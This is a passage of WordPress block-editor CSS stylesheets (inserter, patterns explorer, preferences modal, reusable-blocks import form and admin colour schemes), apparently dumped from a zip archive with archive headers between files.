position:absolute; right:350px; top:-1px; width:280px; } .block-editor-inserter__category-panel .block-editor-block-patterns-list,.block-editor-inserter__category-panel .block-editor-inserter__media-list{ padding:0 24px 16px; } } .block-editor-inserter__patterns-category-panel-header{ padding:8px 0; } @media (min-width:782px){ .block-editor-inserter__patterns-category-panel-header{ padding:8px 24px; } } .block-editor-inserter__patterns-category-no-results{ margin-top:24px; } .block-editor-inserter__patterns-filter-help{ border-top:1px solid #ddd; color:#757575; min-width:280px; padding:16px; } .block-editor-block-patterns-list,.block-editor-inserter__media-list{ flex-grow:1; height:100%; overflow-y:auto; } .block-editor-inserter__preview-content{ align-items:center; background:#f0f0f0; display:grid; flex-grow:1; } .block-editor-inserter__preview-content-missing{ align-items:center; background:#f0f0f0; border-radius:2px; color:#757575; display:flex; flex:1; justify-content:center; min-height:144px; } .block-editor-inserter__tips{ border-top:1px solid #ddd; flex-shrink:0; padding:16px; position:relative; } .block-editor-inserter__quick-inserter{ max-width:100%; width:100%; } @media (min-width:782px){ .block-editor-inserter__quick-inserter{ width:350px; } } .block-editor-inserter__quick-inserter-results .block-editor-inserter__panel-header{ float:right; height:0; padding:0; } .block-editor-inserter__quick-inserter.has-expand .block-editor-inserter__panel-content,.block-editor-inserter__quick-inserter.has-search .block-editor-inserter__panel-content{ padding:16px; } .block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list{ display:grid; grid-template-columns:1fr 1fr; grid-gap:8px; } .block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{ min-height:100px; } .block-editor-inserter__quick-inserter-separator{ border-top:1px solid #ddd; } .block-editor-inserter__popover.is-quick>.components-popover__content{ padding:0; } .block-editor-inserter__quick-inserter-expand.components-button{ background:#1e1e1e; border-radius:0; color:#fff; display:block; width:100%; } .block-editor-inserter__quick-inserter-expand.components-button:hover{ color:#fff; } .block-editor-inserter__quick-inserter-expand.components-button:active{ color:#ccc; } .block-editor-inserter__quick-inserter-expand.components-button.components-button:focus:not(:disabled){ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); box-shadow:none; } .block-editor-block-patterns-explorer__sidebar{ bottom:0; overflow-x:visible; overflow-y:auto; padding:24px 32px 32px; position:absolute; right:0; top:72px; width:280px; } .block-editor-block-patterns-explorer__sidebar__categories-list__item{ display:block; height:48px; text-align:right; width:100%; } .block-editor-block-patterns-explorer__search{ margin-bottom:32px; } .block-editor-block-patterns-explorer__search-results-count{ padding-bottom:32px; } .block-editor-block-patterns-explorer__list{ margin-right:280px; padding:24px 0 32px; } .block-editor-block-patterns-explorer__list .block-editor-patterns__sync-status-filter .components-input-control__container{ width:380px; } .block-editor-block-patterns-explorer .block-editor-block-patterns-list{ display:grid; grid-gap:32px; grid-template-columns:repeat(1, 1fr); margin-bottom:16px; } @media (min-width:1080px){ .block-editor-block-patterns-explorer .block-editor-block-patterns-list{ grid-template-columns:repeat(2, 1fr); } } @media (min-width:1440px){ .block-editor-block-patterns-explorer .block-editor-block-patterns-list{ grid-template-columns:repeat(3, 1fr); } } .block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ min-height:240px; } .block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{ height:inherit; max-height:800px; min-height:100px; } .components-heading.block-editor-inserter__patterns-category-panel-title{ font-weight:500; } .block-editor-inserter__media-library-button.components-button,.block-editor-inserter__patterns-explore-button.components-button{ justify-content:center; margin-top:16px; padding:16px; width:100%; } .block-editor-inserter__media-panel{ display:flex; flex-direction:column; min-height:100%; padding:0 16px; } @media (min-width:782px){ .block-editor-inserter__media-panel{ padding:0; } } .block-editor-inserter__media-panel .block-editor-inserter__media-panel-spinner{ align-items:center; display:flex; flex:1; height:100%; justify-content:center; } .block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{ margin-bottom:24px; } @media (min-width:782px){ .block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{ margin-bottom:0; padding:16px 24px; } } .block-editor-inserter__media-list__list-item{ cursor:pointer; margin-bottom:24px; position:relative; } .block-editor-inserter__media-list__list-item.is-placeholder{ min-height:100px; } .block-editor-inserter__media-list__list-item[draggable=true] .block-editor-inserter__media-list__list-item{ cursor:grab; } .block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview>*{ outline-color:#0000004d; } .block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview-options>button{ display:block; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options{ left:8px; position:absolute; top:8px; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button{ background:#fff; display:none; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button.is-opened,.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:focus{ display:block; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:hover{ box-shadow:inset 0 0 0 2px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-inserter__media-list__item{ height:100%; } .block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview{ align-items:center; border-radius:2px; display:flex; overflow:hidden; } .block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview>*{ margin:0 auto; max-width:100%; outline:1px solid #0000001a; outline-offset:-1px; } .block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview .block-editor-inserter__media-list__item-preview-spinner{ align-items:center; background:#ffffffb3; display:flex; height:100%; justify-content:center; pointer-events:none; position:absolute; width:100%; } .block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{ outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1); outline-width:var(--wp-admin-border-width-focus); } @media not (prefers-reduced-motion){ .block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{ transition:outline .1s linear; } } .block-editor-inserter__media-list__item-preview-options__popover .components-menu-item__button .components-menu-item__item{ min-width:auto; } .block-editor-inserter__mobile-tab-navigation{ height:100%; padding:16px; } .block-editor-inserter__mobile-tab-navigation>*{ height:100%; } @media (min-width:600px){ .block-editor-inserter-media-tab-media-preview-inserter-external-image-modal{ max-width:480px; } } .block-editor-inserter-media-tab-media-preview-inserter-external-image-modal p{ margin:0; } .block-editor-inserter__hint{ margin:16px 16px 0; } .block-editor-patterns__sync-status-filter .components-input-control__container select.components-select-control__input{ height:40px; } .block-editor-inserter__pattern-panel-placeholder{ display:none; } .block-editor-inserter__menu.is-zoom-out{ display:flex; } @media (min-width:782px){ .block-editor-inserter__menu.is-zoom-out.show-panel:after{ content:""; display:block; height:100%; width:300px; } } @media (max-width:959px){ .show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{ flex-direction:column; } } .show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{ flex-direction:column; } .block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{ display:none; padding:0 24px 16px; } @media (min-width:480px){ .block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{ display:block; } } .spacing-sizes-control{ border:0; margin:0; padding:0; } .spacing-sizes-control .spacing-sizes-control__custom-value-input,.spacing-sizes-control .spacing-sizes-control__label{ margin-bottom:0; } .spacing-sizes-control .spacing-sizes-control__custom-value-range,.spacing-sizes-control .spacing-sizes-control__range-control{ flex:1; margin-bottom:0; } .spacing-sizes-control__header{ height:16px; margin-bottom:12px; } .spacing-sizes-control__dropdown{ height:24px; } .spacing-sizes-control__custom-select-control,.spacing-sizes-control__custom-value-input{ flex:1; } .spacing-sizes-control__custom-toggle,.spacing-sizes-control__icon{ flex:0 0 auto; } .spacing-sizes-control__icon{ margin-right:-4px; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!dist/preferences/style.min.cssnuȯ.preference-base-option+.preference-base-option{margin-top:16px}@media (min-width:600px){.preferences-modal{height:calc(100% - 128px);width:calc(100% - 32px)}}@media (min-width:782px){.preferences-modal{width:750px}}@media (min-width:960px){.preferences-modal{height:70%}}@media (max-width:781px){.preferences-modal .components-modal__content{padding:0}}.preferences__tabs-tablist{left:16px;position:absolute!important;top:88px;width:160px}.preferences__tabs-tabpanel{margin-left:160px;padding-left:24px}@media (max-width:781px){.preferences__provider{height:100%}}.preferences-modal__section{border:0;margin:0 0 2.5rem;padding:0}.preferences-modal__section:last-child{margin:0}.preferences-modal__section-legend{margin-bottom:8px}.preferences-modal__section-title{font-size:.9rem;font-weight:600;margin-top:0}.preferences-modal__section-description{color:#757575;font-size:12px;font-style:normal;margin:-8px 0 8px}.preferences-modal__section:has(.preferences-modal__section-content:empty){display:none}PK!gddist/preferences/style.cssnuȯ.preference-base-option+.preference-base-option{ margin-top:16px; } @media (min-width:600px){ .preferences-modal{ height:calc(100% - 128px); width:calc(100% - 32px); } } @media (min-width:782px){ .preferences-modal{ width:750px; } } @media (min-width:960px){ .preferences-modal{ height:70%; } } @media (max-width:781px){ .preferences-modal .components-modal__content{ padding:0; } } .preferences__tabs-tablist{ left:16px; position:absolute !important; top:88px; width:160px; } .preferences__tabs-tabpanel{ margin-left:160px; padding-left:24px; } @media (max-width:781px){ .preferences__provider{ height:100%; } } .preferences-modal__section{ border:0; margin:0 0 2.5rem; padding:0; } .preferences-modal__section:last-child{ margin:0; } .preferences-modal__section-legend{ margin-bottom:8px; } .preferences-modal__section-title{ font-size:.9rem; font-weight:600; margin-top:0; } .preferences-modal__section-description{ color:#757575; font-size:12px; font-style:normal; margin:-8px 0 8px; } .preferences-modal__section:has(.preferences-modal__section-content:empty){ display:none; }PK!]"dist/preferences/style-rtl.min.cssnuȯ.preference-base-option+.preference-base-option{margin-top:16px}@media (min-width:600px){.preferences-modal{height:calc(100% - 128px);width:calc(100% - 32px)}}@media (min-width:782px){.preferences-modal{width:750px}}@media (min-width:960px){.preferences-modal{height:70%}}@media (max-width:781px){.preferences-modal .components-modal__content{padding:0}}.preferences__tabs-tablist{position:absolute!important;right:16px;top:88px;width:160px}.preferences__tabs-tabpanel{margin-right:160px;padding-right:24px}@media (max-width:781px){.preferences__provider{height:100%}}.preferences-modal__section{border:0;margin:0 0 2.5rem;padding:0}.preferences-modal__section:last-child{margin:0}.preferences-modal__section-legend{margin-bottom:8px}.preferences-modal__section-title{font-size:.9rem;font-weight:600;margin-top:0}.preferences-modal__section-description{color:#757575;font-size:12px;font-style:normal;margin:-8px 0 8px}.preferences-modal__section:has(.preferences-modal__section-content:empty){display:none}PK!_mdist/preferences/style-rtl.cssnuȯ.preference-base-option+.preference-base-option{ margin-top:16px; } @media (min-width:600px){ .preferences-modal{ height:calc(100% - 128px); width:calc(100% - 32px); } } @media (min-width:782px){ .preferences-modal{ width:750px; } } @media (min-width:960px){ .preferences-modal{ height:70%; } } @media (max-width:781px){ .preferences-modal .components-modal__content{ padding:0; } } .preferences__tabs-tablist{ position:absolute !important; right:16px; top:88px; width:160px; } .preferences__tabs-tabpanel{ margin-right:160px; padding-right:24px; } @media (max-width:781px){ .preferences__provider{ height:100%; } } .preferences-modal__section{ border:0; margin:0 0 2.5rem; padding:0; } .preferences-modal__section:last-child{ margin:0; } .preferences-modal__section-legend{ margin-bottom:8px; } .preferences-modal__section-title{ font-size:.9rem; font-weight:600; margin-top:0; } .preferences-modal__section-description{ color:#757575; font-size:12px; font-style:normal; margin:-8px 0 8px; } .preferences-modal__section:has(.preferences-modal__section-content:empty){ display:none; }PK!)%%#dist/list-reusable-blocks/style.cssnuȯ.list-reusable-blocks-import-dropdown__content .components-popover__content{ padding:10px; } [class].list-reusable-blocks-import-dropdown__button{ height:30px; } .list-reusable-blocks-import-form__label{ display:block; margin-bottom:10px; } .list-reusable-blocks-import-form__button{ float:right; margin-top:10px; } .list-reusable-blocks-import-form .components-notice__content{ margin:0; } .list-reusable-blocks-import-form .components-notice.is-dismissible{ margin:5px 0; padding-right:0; } .list-reusable-blocks__container{ align-items:center; display:inline-flex; position:relative; top:-3px; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!n{{+dist/list-reusable-blocks/style-rtl.min.cssnuȯ.list-reusable-blocks-import-dropdown__content .components-popover__content{padding:10px}[class].list-reusable-blocks-import-dropdown__button{height:30px}.list-reusable-blocks-import-form__label{display:block;margin-bottom:10px}.list-reusable-blocks-import-form__button{float:left;margin-top:10px}.list-reusable-blocks-import-form .components-notice__content{margin:0}.list-reusable-blocks-import-form .components-notice.is-dismissible{margin:5px 0;padding-left:0}.list-reusable-blocks__container{align-items:center;display:inline-flex;position:relative;top:-3px}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!}}'dist/list-reusable-blocks/style.min.cssnuȯ.list-reusable-blocks-import-dropdown__content .components-popover__content{padding:10px}[class].list-reusable-blocks-import-dropdown__button{height:30px}.list-reusable-blocks-import-form__label{display:block;margin-bottom:10px}.list-reusable-blocks-import-form__button{float:right;margin-top:10px}.list-reusable-blocks-import-form .components-notice__content{margin:0}.list-reusable-blocks-import-form .components-notice.is-dismissible{margin:5px 0;padding-right:0}.list-reusable-blocks__container{align-items:center;display:inline-flex;position:relative;top:-3px}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!!##'dist/list-reusable-blocks/style-rtl.cssnuȯ.list-reusable-blocks-import-dropdown__content .components-popover__content{ padding:10px; } [class].list-reusable-blocks-import-dropdown__button{ height:30px; } .list-reusable-blocks-import-form__label{ display:block; margin-bottom:10px; } .list-reusable-blocks-import-form__button{ float:left; margin-top:10px; } .list-reusable-blocks-import-form .components-notice__content{ margin:0; } .list-reusable-blocks-import-form .components-notice.is-dismissible{ margin:5px 0; padding-left:0; } .list-reusable-blocks__container{ align-items:center; display:inline-flex; position:relative; top:-3px; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; 